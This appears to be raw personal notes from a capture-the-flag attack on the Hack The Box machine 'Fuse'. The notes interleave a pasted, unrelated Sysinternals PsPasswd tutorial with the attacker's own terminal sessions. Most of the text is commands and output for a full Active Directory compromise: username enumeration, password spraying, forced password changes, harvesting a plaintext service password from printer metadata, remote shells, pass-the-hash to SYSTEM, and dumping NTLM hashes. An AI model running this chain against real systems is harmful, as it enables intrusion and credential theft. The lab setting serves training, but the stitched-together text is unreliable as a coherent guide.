E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc fabricorp.local -d fabricorp userlistsmall.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 06/17/20 - Ronnie Flathers @ropnop 2020/06/17 12:27:46 > Using KDC(s): 2020/06/17 12:27:46 > fabricorp.local:88 2020/06/17 12:27:46 > [+] VALID USERNAME: fuse@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: Administrator@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: tlavel@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: sthompson@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: pmerton@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: bnielson@fabricorp 2020/06/17 12:27:46 > [+] VALID USERNAME: bhult@fabricorp 2020/06/17 12:27:46 > Done! Tested 9 usernames (7 valid) in 0.153 seconds
.
check if any of these 7 have UF_DONT_REQUIRE_PREAUTH set
root@kali:~/htb/fuse# GetNPUsers.py -dc-ip 10.10.10.193 -no-pass FABRICORP.LOCAL/bnielson Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation [*] Getting TGT for bnielson [-] User bnielson doesn't have UF_DONT_REQUIRE_PREAUTH set
.
E:\PENTEST>crackmapexec.exe 10.10.10.193 -u usernames.txt -p Fabricorp01 06-17-2020 14:20:32 [*] 10.10.10.193:445 is running Windows 10.0 Build 14393 (name:FUSE) (domain:FABRICORP) 06-17-2020 14:20:34 [-] 10.10.10.193:445 FABRICORP\fuse:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 06-17-2020 14:20:34 [-] 10.10.10.193:445 FABRICORP\Administrator:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\tlavel:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.) 06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\sthompson:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\pmerton:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\bnielson:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.) 06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\bhult:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
.
tried but failed
Remote Windows Systems Using SyInternals PsPasswd
We all know that a good Administrator will find a way to automate or make boring tasks easy. Changing passwords on Windows systems, usually Administrator accounts, is one of those we least like to do but have to for audit purposes and also when other administrators leave.
Well, here is another tool that can help with changing passwords. The free utility PsPasswd is part of Microsoft’s SysInternal’s PsTools that lets you change an account password on the local or remote systems, to enable admin’s to create batch files that run PsPasswd against the computers they manage to perform a mass change of the administrator password.
And for security, PsPasswd does not send passwords over the network in the clear. You can use PsPasswd to change the password of a local or domain account on the local or a remote computer.
So how does it work?
usage: pspasswd [[\\computer[,computer[,..] | @file [-u user [-p psswd]]] Username [NewPassword]
computer – Perform the command on the remote computer or computers specified. If you omit the computer name the command runs on the local system, and if you specify a wildcard (\\*), the command runs on all computers in the current domain.
@file – Run the command on each computer listed in the text file specified.
-u – Specifies optional user name for login to remote computer.
-p – Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password.
Username – Specifies name of account for password change.
NewPassword – New password. If ommitted a NULL password is applied.
So say we wanted to change the password on a server.
1
|
pspasswd \\win2008tst –u myadmin –p myadmpasswd Administrator newpasswd
|
That’s all. Now say we don’t want to pass the password on the command line, then omit the -p and a popup will prompt you for the password.
E:\PENTEST>pspasswd \\10.10.10.193 -u tlavel -p Fabricorp01 tlavel F!bricorp02! PsPasswd v1.24 - Local and remote password changer Copyright (C) 2003-2016 Mark Russinovich Sysinternals - www.sysinternals.com Error changing password: Access is denied. E:\PENTEST>
.
tried
root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson Old SMB password:Fabricorp01 New SMB password:1234567 Retype new SMB password: machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson Old SMB password:Fabricorp01 New SMB password:Fabricorp02 Retype new SMB password: Fabricorp01 Password changed for user bnielson on 10.10.10.193.
.
root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson Old SMB password:Fabricorp01 New SMB password:Fabricorp02 Retype new SMB password:Fabricorp02 Password changed for user bnielson on 10.10.10.193. root@kali:~/htb# smbclient //10.10.10.193/print$ -U bnielson WARNING: The "syslog" option is deprecated Enter WORKGROUP\bnielson's password: Fabricorp02 Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri May 29 20:12:41 2020 .. D 0 Fri May 29 20:12:41 2020 color D 0 Sat Jul 16 09:18:08 2016 IA64 D 0 Fri May 29 20:12:41 2020 W32X86 D 0 Mon Jun 1 05:03:44 2020 x64 D 0 Mon Jun 1 05:03:46 2020 10340607 blocks of size 4096. 7554925 blocks available smb: \>
.
rpcclient -U “bnielson” 10.10.10.193
root@kali:~/htb# rpcclient -U "bnielson" 10.10.10.193 Enter WORKGROUP\bnielson's password:Fabricorp02 rpcclient $> ls command not found: ls rpcclient $> help --------------- ---------------------- CLUSAPI clusapi_open_cluster bla clusapi_get_cluster_name bla -snip- rpcclient $> rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[svc-print] rid:[0x450] user:[bnielson] rid:[0x451] user:[sthompson] rid:[0x641] user:[tlavel] rid:[0x642] user:[pmerton] rid:[0x643] user:[svc-scan] rid:[0x645] user:[bhult] rid:[0x1bbd] user:[dandrews] rid:[0x1bbe] user:[mberbatov] rid:[0x1db1] user:[astein] rid:[0x1db2] user:[dmuir] rid:[0x1db3] rpcclient $>
.
rpcclient $> enumprinters flags:[0x800000] name:[\\10.10.10.193\HP-MFT01] description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)] comment:[]
.
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -i 10.10.10.193 -u svc-print Enter Password: $fab@s3Rv1ce$1 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-print\Documents> cd .. *Evil-WinRM* PS C:\Users\svc-print> cd desktop *Evil-WinRM* PS C:\Users\svc-print\desktop> dir Directory: C:\Users\svc-print\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 6/17/2020 11:49 PM 34 user.txt *Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt 867719f8b9ef372cd05d1e30997c7d28 *Evil-WinRM* PS C:\Users\svc-print\desktop>
.
root@kali:~/htb/fuse# psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e Administrator@10.10.10.193 Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on 10.10.10.193..... [*] Found writable share ADMIN$ [*] Uploading file VwvVtgEd.exe [*] Opening SVCManager on 10.10.10.193..... [*] Creating service fhoH on 10.10.10.193..... [*] Starting service fhoH..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32>cd c:\users\desktop The system cannot find the path specified. C:\Windows\system32>cd c:\users c:\Users>cd Administrator c:\Users\Administrator>cd desktop c:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is E6C8-44FE Directory of c:\Users\Administrator\Desktop 06/01/2020 02:03 AM <DIR> . 06/01/2020 02:03 AM <DIR> .. 06/17/2020 11:49 PM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 30,865,776,640 bytes free c:\Users\Administrator\Desktop>type root.txt 2b81c0276298df3453ae7da86e9babf4 c:\Users\Administrator\Desktop> .
.
c:\tja>pwdump8 PwDump v8.2 - dumps windows password hashes - by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:521A94AF0CFA785A1EEC638D803E482C Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0 DefaultAccount:503:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
.